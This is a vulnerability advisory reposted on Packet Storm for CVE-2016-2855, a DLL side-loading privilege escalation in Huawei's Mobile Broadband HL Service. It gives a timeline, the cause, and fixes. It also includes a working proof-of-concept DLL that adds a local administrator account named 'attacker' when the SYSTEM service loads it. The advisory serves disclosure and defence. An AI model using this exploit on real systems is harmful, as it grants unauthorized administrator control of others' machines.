what you don't know can hurt you

Huawei Mobile Broadband HL Service 22.001.25.00.03 Local Privilege Escalation

Huawei Mobile Broadband HL Service 22.001.25.00.03 Local Privilege Escalation
Posted May 12, 2016
Authored by Florian Bogner

Huawei Mobile Broadband HL Service versions 22.001.25.00.03 and below are vulnerable to a DLL side loading attack allowing normal unprivileged users to gain full SYSTEM access.

tags | exploit
advisories | CVE-2016-2855
MD5 | 1e5fb53e7a9b0a870cea79231268057a

Huawei Mobile Broadband HL Service 22.001.25.00.03 Local Privilege Escalation

Change Mirror Download
Huawei Mobile Broadband HL Service Local Privilege Escalation

Metadata
===================================================
Release Date: 12-05-2016
Author: Florian Bogner @ Kapsch BusinessCom AG (https://www.kapsch.net/kbc)
Affected versions: up to the current 22.001.25.00.03 on x86 and x64
Tested on: Windows 7 32 bit and 64 bit
CVE : CVE-2016-2855
URL: https://bogner.sh/2016/05/cve-2016-2855-huawei-mobile-broadband-hl-service-local-privilege-escalation/
Video: https://youtu.be/MwtjE2PmEJU
Vulnerability Status: Fixed

Abstract
===================================================
The Windows service "Mobile Broadband HL Service" as installed by many? Huawei 3G/LTE modems is vulnerable to a DLL side loading attack allowing normal unprivileged users to gain full SYSTEM access.

Disclosure Timeline
===================================================
6.3.2016: Issue privately reported to Huawei
6.3.2016: CVE number requested
7.3.2016: MITRE assigned CVE-2016-2855
14.3.2016: Huawei verified the issue and is working on a fix
9.5.2016: Huawei informed me that the issue has been fixed in their latest release. However it is up to the carriers to push the fix to the devices.

Technical Details
===================================================
The service executable for the "Mobile Broadband HL Service" service is located in "C:\ProgramData\MobileBrServ". As the file permissions of this folder allow normal users to add files a malicious local attacker can drop a DLL named VERSION.dll into this folder. During the next boot this DLL is loaded and executed as part of the service launch. This causes a Local Privilege Escalation as this service is run as LOCAL SYSTEM.

Proof of Concept
===================================================
#include <process.h>

/*
To compile 32bit dll:
cl.exe /D_USRDLL /D_WINDLL version.cpp /link /DLL /OUT:version.dll

Put into C:\ProgramData\MobileBrServ and reboot your system -> a new user will be added
*/

/* export all required functions - use Dependency Walker to check what is needed */
extern "C"
{
__declspec(dllexport) int GetFileVersionInfoA();
__declspec(dllexport) int GetFileVersionInfoSizeA();
__declspec(dllexport) int VerQueryValueA();
}

/*
Implement DLLMain with common datatypes so we don't have to include windows.h.
Otherwise this would cause several compile errors because of the already known but reexported functions.
*/
int DllMain(void* hinst, unsigned long* reason, void* reserved) {
system("cmd /c \"echo>%tmp%\\dll_loaded\""); // cmd /c "echo>%tmp%\dll_loaded"
system("net user attacker Batman42 /add");
system("net localgroup Administrators attacker /add");

return 0;
}

/* Implement stubs of our exports */
int GetFileVersionInfoA() {
return 0;
}

int GetFileVersionInfoSizeA() {
return 0;
}

int VerQueryValueA() {
return 0;
}

Suggested Solution
===================================================
The correct solution to prevent this attack is so change the filesystem ACLs so that normal users are prohibited from creating files and directories within the C:\ProgramData\MobileBrServ folder.

Workaround
===================================================
Until Huawei pushes a fix the filesystem ACLs should be updated manually to prevent normal users to write anything into the service directory (C:\ProgramData\MobileBrServ). This can be automated using icacls.exe.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    10 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    1 Files
  • 19
    Aug 19th
    18 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close